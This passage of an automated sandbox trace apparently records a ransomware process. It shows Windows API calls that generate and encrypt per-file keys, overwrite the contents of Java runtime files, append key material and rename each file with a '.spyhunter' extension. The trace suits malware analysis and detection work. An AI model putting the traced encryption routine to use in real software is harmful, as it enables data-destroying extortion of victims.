lpNumberOfBytesWritten=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce41c*=0x30, lpOverlapped=0x0) returned 1 [0171.721] CloseHandle (hObject=0x178) returned 1 [0171.721] GetProcessHeap () returned 0x2c0000 [0171.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.721] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados.spyhunter") returned 70 [0171.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados.spyhunter")) returned 1 [0171.730] GetProcessHeap () returned 0x2c0000 [0171.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.730] GetProcessHeap () returned 0x2c0000 [0171.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.731] GetProcessHeap () returned 0x2c0000 [0171.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfad8 | out: hHeap=0x2c0000) returned 1 [0171.731] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce460 | out: pbBuffer=0x25ce460) returned 1 [0171.731] GetProcessHeap () returned 0x2c0000 [0171.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.731] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce458*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce458*=0x30) returned 1 [0171.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.752] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan") returned 60 [0171.752] StrStrW (lpFirst="Atikokan", lpSrch=".txt") returned 0x0 [0171.752] GetProcessHeap () returned 0x2c0000 [0171.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.752] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce41c*=0x5d, lpOverlapped=0x0) returned 1 [0171.753] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffa3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.753] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce41c*=0x5d, lpOverlapped=0x0) returned 1 [0171.753] GetProcessHeap () returned 0x2c0000 [0171.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.753] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.753] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x25ce45c*, lpNumberOfBytesWritten=0x25ce41c*=0x4, lpOverlapped=0x0) returned 1 [0171.753] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce41c*=0x30, lpOverlapped=0x0) returned 1 [0171.753] CloseHandle (hObject=0x9c) returned 1 [0171.754] GetProcessHeap () returned 0x2c0000 [0171.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.754] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan.spyhunter") returned 70 [0171.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan.spyhunter")) returned 1 [0171.755] GetProcessHeap () returned 0x2c0000 [0171.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.755] GetProcessHeap () returned 0x2c0000 [0171.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.755] GetProcessHeap () returned 0x2c0000 [0171.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfc68 | out: hHeap=0x2c0000) returned 1 [0171.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce458 | out: pbBuffer=0x25ce458) returned 1 [0171.755] GetProcessHeap () returned 0x2c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce450*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce450*=0x30) returned 1 [0171.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman") returned 69 [0171.834] StrStrW (lpFirst="Tucuman", lpSrch=".txt") returned 0x0 [0171.834] GetProcessHeap () returned 0x2c0000 [0171.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.835] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce414*=0x235, lpOverlapped=0x0) returned 1 [0171.835] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.835] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x235, lpNumberOfBytesWritten=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce414*=0x235, lpOverlapped=0x0) returned 1 [0171.836] GetProcessHeap () returned 0x2c0000 [0171.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.836] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.836] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x25ce454*, lpNumberOfBytesWritten=0x25ce414*=0x4, lpOverlapped=0x0) returned 1 [0171.836] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce414*=0x30, lpOverlapped=0x0) returned 1 [0171.836] CloseHandle (hObject=0x9c) returned 1 [0171.836] GetProcessHeap () returned 0x2c0000 [0171.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.836] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman.spyhunter") returned 79 [0171.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman.spyhunter")) returned 1 [0171.838] GetProcessHeap () returned 0x2c0000 [0171.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.838] GetProcessHeap () returned 0x2c0000 [0171.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.838] GetProcessHeap () returned 0x2c0000 [0171.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d2c0 | out: hHeap=0x2c0000) returned 1 [0171.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce458 | out: pbBuffer=0x25ce458) returned 1 [0171.838] GetProcessHeap () returned 0x2c0000 [0171.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce450*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce450*=0x30) returned 1 [0171.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar") returned 58 [0171.839] StrStrW (lpFirst="sunpkcs11.jar", lpSrch=".txt") returned 0x0 [0171.839] GetProcessHeap () returned 0x2c0000 [0171.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.839] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce414*=0x2800, lpOverlapped=0x0) returned 1 [0171.894] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.894] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce414*=0x2800, lpOverlapped=0x0) returned 1 [0171.894] GetProcessHeap () returned 0x2c0000 [0171.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.894] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.894] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x25ce454*, lpNumberOfBytesWritten=0x25ce414*=0x4, lpOverlapped=0x0) returned 1 [0171.946] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce414, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce414*=0x30, lpOverlapped=0x0) returned 1 [0171.946] CloseHandle (hObject=0x9c) returned 1 [0171.946] GetProcessHeap () returned 0x2c0000 [0171.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.946] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.spyhunter") returned 68 [0171.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar.spyhunter")) returned 1 [0171.947] GetProcessHeap () returned 0x2c0000 [0171.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.947] GetProcessHeap () returned 0x2c0000 [0171.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.947] GetProcessHeap () returned 0x2c0000 [0171.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60000 | out: hHeap=0x2c0000) returned 1 [0171.948] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce450 | out: pbBuffer=0x25ce450) returned 1 [0171.948] GetProcessHeap () returned 0x2c0000 [0171.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.948] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce448*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce448*=0x30) returned 1 [0171.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.949] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar") returned 59 [0171.949] StrStrW (lpFirst="localedata.jar", lpSrch=".txt") returned 0x0 [0171.949] GetProcessHeap () returned 0x2c0000 [0171.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.949] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce40c*=0x2800, lpOverlapped=0x0) returned 1 [0171.950] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.951] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce40c*=0x2800, lpOverlapped=0x0) returned 1 [0171.951] GetProcessHeap () returned 0x2c0000 [0171.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.951] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.951] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x25ce44c*, lpNumberOfBytesWritten=0x25ce40c*=0x4, lpOverlapped=0x0) returned 1 [0171.952] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce40c*=0x30, lpOverlapped=0x0) returned 1 [0171.952] CloseHandle (hObject=0x9c) returned 1 [0171.952] GetProcessHeap () returned 0x2c0000 [0171.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.953] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.spyhunter") returned 69 [0171.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar.spyhunter")) returned 1 [0171.954] GetProcessHeap () returned 0x2c0000 [0171.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.954] GetProcessHeap () returned 0x2c0000 [0171.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.954] GetProcessHeap () returned 0x2c0000 [0171.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fe80 | out: hHeap=0x2c0000) returned 1 [0171.954] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce450 | out: pbBuffer=0x25ce450) returned 1 [0171.954] GetProcessHeap () returned 0x2c0000 [0171.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.954] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce448*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce448*=0x30) returned 1 [0171.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.955] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar") returned 56 [0171.955] StrStrW (lpFirst="jaccess.jar", lpSrch=".txt") returned 0x0 [0171.956] GetProcessHeap () returned 0x2c0000 [0171.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.956] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce40c*=0x2800, lpOverlapped=0x0) returned 1 [0171.957] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.957] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce40c*=0x2800, lpOverlapped=0x0) returned 1 [0171.957] GetProcessHeap () returned 0x2c0000 [0171.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.957] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.957] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x25ce44c*, lpNumberOfBytesWritten=0x25ce40c*=0x4, lpOverlapped=0x0) returned 1 [0171.958] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce40c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce40c*=0x30, lpOverlapped=0x0) returned 1 [0171.958] CloseHandle (hObject=0x9c) returned 1 [0171.958] GetProcessHeap () returned 0x2c0000 [0171.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.958] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.spyhunter") returned 66 [0171.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar.spyhunter")) returned 1 [0171.960] GetProcessHeap () returned 0x2c0000 [0171.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.961] GetProcessHeap () returned 0x2c0000 [0171.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.961] GetProcessHeap () returned 0x2c0000 [0171.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fdc0 | out: hHeap=0x2c0000) returned 1 [0171.961] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce448 | out: pbBuffer=0x25ce448) returned 1 [0171.961] GetProcessHeap () returned 0x2c0000 [0171.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.961] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce440*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce440*=0x30) returned 1 [0171.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.962] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar") returned 54 [0171.962] StrStrW (lpFirst="dnsns.jar", lpSrch=".txt") returned 0x0 [0171.962] GetProcessHeap () returned 0x2c0000 [0171.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.962] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce404*=0x22e6, lpOverlapped=0x0) returned 1 [0172.055] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffdd1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.055] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x22e6, lpNumberOfBytesWritten=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce404*=0x22e6, lpOverlapped=0x0) returned 1 [0172.055] GetProcessHeap () returned 0x2c0000 [0172.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.055] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.055] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x25ce444*, lpNumberOfBytesWritten=0x25ce404*=0x4, lpOverlapped=0x0) returned 1 [0172.055] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce404*=0x30, lpOverlapped=0x0) returned 1 [0172.055] CloseHandle (hObject=0x9c) returned 1 [0172.056] GetProcessHeap () returned 0x2c0000 [0172.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.056] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.spyhunter") returned 64 [0172.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar.spyhunter")) returned 1 [0172.056] GetProcessHeap () returned 0x2c0000 [0172.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.056] GetProcessHeap () returned 0x2c0000 [0172.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.057] GetProcessHeap () returned 0x2c0000 [0172.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3b58 | out: hHeap=0x2c0000) returned 1 [0172.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce448 | out: pbBuffer=0x25ce448) returned 1 [0172.057] GetProcessHeap () returned 0x2c0000 [0172.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce440*=0x20, dwBufLen=0x30 | out: 